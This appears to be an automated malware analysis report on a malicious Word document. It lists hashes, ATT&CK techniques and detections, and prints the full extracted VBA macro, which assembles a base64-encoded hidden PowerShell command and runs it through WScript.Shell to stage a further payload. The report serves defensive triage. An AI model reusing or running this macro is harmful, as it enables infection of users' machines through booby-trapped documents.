Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 47c854a83e2eae24…

MALICIOUS

Office (OOXML)

24.1 KB Created: 2021-10-07 08:14:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-10-23
MD5: 283c2ed7a22891c3432b4fa8a76d325c SHA-1: 07bede9c937c3847a581f3d607132e2423b670e9 SHA-256: 47c854a83e2eae24daab734cb633e61bfe3eb37329df2516cb7acd9740d16d5f
442 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

This document contains VBA macros that leverage WScript.Shell and CreateObject to execute a PowerShell command. The reconstructed PowerShell command is: powershell.exe -nop -w hidden -ExecutionPolicy Bypass -e [base64 encoded string]. This command is designed to download and execute a second-stage payload, likely for further malicious activity. The presence of Shell() and PowerShell references strongly indicates a downloader or dropper functionality.

Heuristics 9

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    CreateObject("Wscript.Shell").Run Str
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    CreateObject("Wscript.Shell").Run Str
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    Str = Str + "powershell.exe -nop -w hidden  -ExecutionPolicy By"
Str = Str + "pass -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAeg"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject("Wscript.Shell").Run Str
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8673 bytes
SHA-256: d5843a9f6b2194755e487d5d00c29393eb14df2e97f464aa3ab2f5c5e8a92f1c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub MyMacro()
Dim Str As String


Str = Str + "powershell.exe -nop -w hidden  -ExecutionPolicy By"
Str = Str + "pass -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAeg"
Str = Str + "BlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBz"
Str = Str + "AGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9AC"
Str = Str + "QAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8A"
Str = Str + "dwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQ"
Str = Str + "BsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAu"
Str = Str + "AGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAH"
Str = Str + "QAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMA"
Str = Str + "cwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOw"
Str = Str + "AkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBB"
Str = Str + "AHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAG"
Str = Str + "gAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQA"
Str = Str + "YgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdw"
Str = Str + "AtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBT"
Str = Str + "AHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAG"
Str = Str + "oAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAA"
Str = Str + "cgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKA"
Str = Str + "AoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAu"
Str = Str + "AEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAF"
Str = Str + "MAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIA"
Str = Str + "bwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANA"
Str = Str + "BzAEkAQQBGADYAbgBYAG0ARQBDAEEANwBWAFcAYQAyAC8AYQBT"
Str = Str + "AEIAVAA5AG4ARQBqADUARAAxAGEARgBaAEYAcwBpAHYATQBJAD"
Str = Str + "IAVABhAFIASwBhAC8ATQAwAHcAUQBuAGcAWQBBAEkAVQBWAFkA"
Str = Str + "TQA5AHQAaQBlAE0AUABYAFEAOABEAG8AOQB1AC8ALwB0AGUAZw"
Str = Str + "A1ADIAbQBTAHIAcgBiAHIAcgBRAFcAaQBQAEgATQBmAFoANQA3"
Str = Str + "ADcAaAAyADgASgBIAEkARQBZAFoARwBVAGYASgBHACsAbgBwAD"
Str = Str + "IAZQBEAEIAQgBIAG8AYQBRAFUAbABzAE8AdwBLAEIAWABZAC8A"
Str = Str + "YwBOAEkAUABUAG0AQgAvAFkASwA3AEQASwBTAFAAawBqAEwAWA"
Str = Str + "AxAHUAcwBtAEMAeABHAEoARgB0AGYAWABqAFkAUgB6AEgASQBu"
Str = Str + "AGoAZQA2AG0ARABoAFIAYgBIAE8ARgB4AFMAZwBtAE4ARgBsAG"
Str = Str + "YANgBTAEoAZwBIAG0AKwBQAHgAdQArAFkAZwBkAEkAWAAyAFYA"
Str = Str + "QwBwADkATABIAGMAcQBXAGkARwBaAGkAdQB3AFoAeQBBAGkAeQ"
Str = Str + "BkAGEANQBHAGIAbgB2AFcAWgBnADkASgBRAFMAdABhAGEARQBx"
Str = Str + "AEgASQBuAHoANwBKADYAdgB5ADgAdQBpAGkAMQB2AGkAUwBJAH"
Str = Str + "gAbwBwAHMANwBXAEsAQgB3ADUASgBMAHEAYQB4AEsAMwA5AFQA"
Str = Str + "VQA0AGYAMQB1AGoAUgBYAFoASgBBADUAbgBNAGYATgBFAGEAVQ"
Str = Str + "BLAGkAaQAxAHAAcABIAE0AWABJAHcANwBkAGcANwBRAG0AYgBX"
Str = Str + "AEEAVABNAGoAVwBVAFYAawBvAEEAUAB4AHkATABoAGsAWgBTAG"
Str = Str + "0AawArAG8AZgBUAHgAVQBaAGwAZwBQAE8ASABNADEAMQBPAFkA"
Str = Str + "NQBqAHUAUwBqAE4AVQA4AHYAegB4AGUASgBQAFoAWgA2ADUASA"
Str = Str + "BTAFcAUgBJAEMARQB1AEcAWgBIAEEAbgBLADAAdAB6AEoAKwBJ"
Str = Str + "AGcAKwBOAFMARgAwAFUAdQB4AFMAUABzAEwAVQBEAEwARQBwAH"
Str = Str + "gARQAvAGsASgBWAFEAZQB5AEoAcgBiAEIAUwBpAEIASgBLAGkA"
Str = Str + "OQBMAHYAbQBGAEYAdQA4AFMAWQBIADcAVgBlAFYAbABKAGQASw"
Str = Str + "BJAEQAVQBRAFgAQwAxAEMARwBWACsAbgBhAFQASQAzAG8AZgBp"
Str = Str + "AG8ASwBMADgAUgBaADEAcAA1AEYAWgA2ADgAKwBvAEQAYgB0AD"
Str = Str + "cAUABUAHMAMQBNAHYASgA4AHIATwBxAEwAOQBrAEMAcQB4AE8A"
Str = Str + "NQBvAGMAMQBoAHQAaQBVAEEAWQB2AEoAUQBlAHkAagBWAEMAbA"
Str = Str + "BLAEoAcgBoAEIAZwB2AEUAZAB2AEIAYgB1AGUAWQBMAFYAeABU"
Str = Str + "AE8AeQBVAG0ASABaAHYATQBQAEYAbgArAHQAWABjADIARQBRAF"
Str = Str + "oAUwBuADUANQBqAFkAagA3AGcASQBVAHMAbABvAFcAQQB1ADMA"
Str = Str + "aABNADAAbwBQAGYAawA3AEsASgB2AFoASQBoAEoAdQA3AEMASQ"
Str = Str + "BYAEUAeQBYAG0AbgB2AEEAVQB4ADkAaQBnACsAWgBGAGoASwB4"
Str = Str + "AFcANABoAEoAawBYAE8ARAByAEQAYgB4AEIAVAA3AFMASwBTAG"
Str = Str + "8AcABaAFYAKwBwAGQAWQBLAGkAWABqAFcAMQBSAE4AQwBYAGMA"
Str = Str + "dwAxAEIAOABvAFUAUQAxAFIAUQBRAGYAWABIAFkASQA2AEYAVQ"
Str = Str + "BHAFEAagBNAG4ARQBJAEUAQgAzAGYAZwBYAG8ARgBEADkAaQBP"
Str = Str + "AGMAKwBtAE0ANABiAHYAYwBlAC8AbwBPAFEAbgBLAEQAbwBqAG"
Str = Str + "cAdQBTAG8ATQBFADIAcwAwAHAAUwBoAFoARwBGAEwAdABGAFMA"
Str = Str + "WQB0AGkAawBoADEAcABpAFcAQwBIAHAAZgB3ADkAWABEAE8AaA"
Str = Str + "BnAGoAZwBvAEYAcgBtADUAaABmAG8ATQBaAE8AYQB3AHcAYQBK"
Str = Str + "AFkAOABNAFMAQgBzAGsASAB5ADkAOQBZAGEATwB3AFQAUgBGAE"
Str = Str + "kAdQBpADEAQwBVAHUAMQBuAGMAVwA4AFgAUABIADgAcAB0AEkA"
Str = Str + "TgBCAEMAbAAwAEEAWgBnADYAUQBrAHEAQQBUAHMAcABBAHAAWg"
Str = Str + "BJAHkAYwBBAGgAeABrAFAAaAAxAFoASwBGAGgAUgBHAHUASwBR"
Str = Str + "ADUAQgA1AHQARAA0AGIAWQBwADgAYQBQAE8ATQA3AEEAZgAyAE"
Str = Str + "kAQgArADcAOABxAHMAUQBjAHoAbwBmAHUAWgB1AGkAawBjAFAA"
Str = Str + "dwBJAGsAQQBvAHMAVQBXAFoASwBFAG8AMgA0AFEASQBHAFMASQ"
Str = Str + "BvAHMAQwAvADYAYgA5AHgAZQBEADQAeABoAEgAZwArAE8AcwBG"
Str = Str + "AGsAcgBlAEkASABOADkASgAxAEoAZQBGADcANgBNAHQASgBTAF"
Str = Str + "QARwBTAHcASABFAEwAZwBBAEEATgBxAGMAaABUAHEASwA4AGYA"
Str = Str + "dgA2AGMAVQBvAG8ANwA4AHAAMwBwAEsASABCAE0AegBVAGkAYQ"
Str = Str + "BqAHIANgBpAGwAUwAxAEQAYQBrAGEASgBuAHoASAA1AE0ASgBn"
Str = Str + "AHoAVQB2ADMAcAB2AGYAWQBMAGYAUABtAE4AdgBBADAASQB6AG"
Str = Str + "IATQA3AHEAQQA1ADcASABiAHIAVAB6ADMATAByAGcAdQByAFoA"
Str = Str + "WQBpAGIAZwBTAEgATQAxAHMAUABqAG8ANgBWADEAUgArAE8AcA"
Str = Str + "BtAEIAbABhADkANQA1AFUAVgB0AFAANgBmAHQAMABqAGUANgB1"
Str = Str + "AHYAdQBkAE4AdAArAGYAMQBlADMAMgA4AHEAKwBuAGIALwA2AE"
Str = Str + "wAdgBlAHQATwBsADUALwBxAFYAbgBqAGEAcAAvAHQARQBsAC8A"
Str = Str + "MABoAGoAcQBsAFIAcgBxAE4AMQB0AEoAZgA2AEoAdgA5AEUAbw"
Str = Str + "A5AGIAcABGAE4AZAAwAGoARwB3ADEAVwB2AEwAWgBaAFQAbQA2"
Str = Str + "AEsAeABWAC8AWQBmAHEAbABlAEkAYgBQAHYAOAAwAGEANAB5AG"
Str = Str + "MAMgA5AG8AVwBpAGUANABjAFAAWQA5AHoAKwA0AEUAcAByAHUA"
Str = Str + "YgBkAHMAdABYAGsALwBwAEsAYQAyAGwAYQBJADIAcgBaAGIAWg"
Str = Str + "AzAGQAVABIAFcAdQBEAGMAcgAyAHUASwAwAFAAeAB5ADEAOQBP"
Str = Str + "AEkAUwA5ADkAMwA3AFoAcQA4AE0AZQByAGIARQAyAE0AaAB2AE"
Str = Str + "0ALwBhAEEAegB6AGQAZABHAEQAMABZAFUAbwBrAEMAZgAyAEQA"
Str = Str + "VQB5AFcAegArAE0AQQByAEQAVgBoAGgARABNAGMAcQBWAHUAdQ"
Str = Str + "BIAGoATABQAHYAUQBuAHgASAA0AHEAMgA2AGgAegBLADIAWgBh"
Str = Str + "AG8AMQBlAHYAdQBnAC8AMgB2AGwAdABEAFEAVwA5AG0ASgAvAD"
Str = Str + "IAcgBXAGUAeQAyAGUAcwAyAE4AcgBrADIAcgByAFoANwBlADcA"
Str = Str + "RwBpAHQAMABYAGoAYwBuAGsAMwBzADEAVwB4AHkAVAAyAGUAVA"
Str = Str + "BjAFgAWABHAHMATABNAHAAQgAyAEMARABZAFAAMwBPAFgAaQAz"
Str = Str + "AEwAWgBzAGMAMwBnAG0AMwBWAEIAMQArAFgAQgAvAHMAaABDAG"
Str = Str + "UAbQB5ADUAcABhAHYAeABoAC8AMABhAEgAUABqAEQANQA1ADgA"
Str = Str + "ZAB6AGkANQBIAEcAMQB2AGQAOABzAGEAMAA4AGIAbABzAHYAMA"
Str = Str + "B1ADUAUQBLAFEAbwBiAEQAaQB5AC8AdQByAEYAMABYACsAMgBY"
Str = Str + "AHcAMgBFAFkAOABEAFIASwBIADQATQBIAG4AegBsAG0AcwB6AD"
Str = Str + "MAcwA2AEcANgBZAEMAUgBWAEUATgBSADQAUABaAGQAWQBSADUA"
Str = Str + "aABDAHIAYwBYADMARwA4ADUAWgB6AFYASwBtAFoATQBPADgAbg"
Str = Str + "BUAG8AdwBoADEAeQBuAE8AegBwAFIAVABPAEcANQBVAFgAdAB6"
Str = Str + "AFoAVQBxAFAAUQB1AHEAMwB3AGQAOAB2AG4AVgA5AFAAWQBNAF"
Str = Str + "EAbwBRADIAQQBwAHEAVQArAGoAbgB3AFIARgBDAHYAYgBpADAA"
Str = Str + "bwBGAHgAbgBWAGwAVwA2ADkAQQBpAHIAKwBlAFYAWQBPAHQAZA"
Str = Str + "AwAHAAcQBxAFoAaABPACsAeQBNAHMAbQBXAGwANgBNAEsAMgBt"
Str = Str + "AG4AVgBIAFkATgBmADkAUAByAEwASgBlAEQATwBEAEgALwBSAG"
Str = Str + "UAcwB2AHUALwA5AHcAKwBrAHYANABWAGMAcABaAHQAbQArADIA"
Str = Str + "dgA5AHgANAA3AGYAZwAvAE0AMwBFAEoANABnAEkAawBMAE4AZw"
Str = Str + "BsAGwAQgA4AHYATQAzAGUAegBEACsAagB4AFkAdgBMAGYAdABl"
Str = Str + "AEUAbQBuAHYAWgBrAC8ANQBUAHUAMAB2AEUAKwBTADMAOABBAH"
Str = Str + "oAZwA3AC8AUgB0ADkANgBSAFUAeQBFAFEAbwBBAEEAQQA9AD0A"
Str = Str + "JwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbw"
Str = Str + "BtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBp"
Str = Str + "AG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAH"
Str = Str + "MAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcA"
Str = Str + "OwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQ"
Str = Str + "A9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0"
Str = Str + "AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAH"
Str = Str + "UAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcA"
Str = Str + "SABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4Abw"
Str = Str + "BXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5"
Str = Str + "AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAH"
Str = Str + "IAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA"

 


CreateObject("Wscript.Shell").Run Str



End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 25600 bytes
SHA-256: 4f7db73c6ad335df6ecb5ff15cf54a5275cca94d3fd825fd15fced076840824b
Detection
ClamAV: Doc.Downloader.Pwshell-10001336-0
Obfuscation or payload: likely
Carved artifact contains a PowerShell -EncodedCommand style payload.

Open this report in the interactive analyzer, or submit your own file for analysis.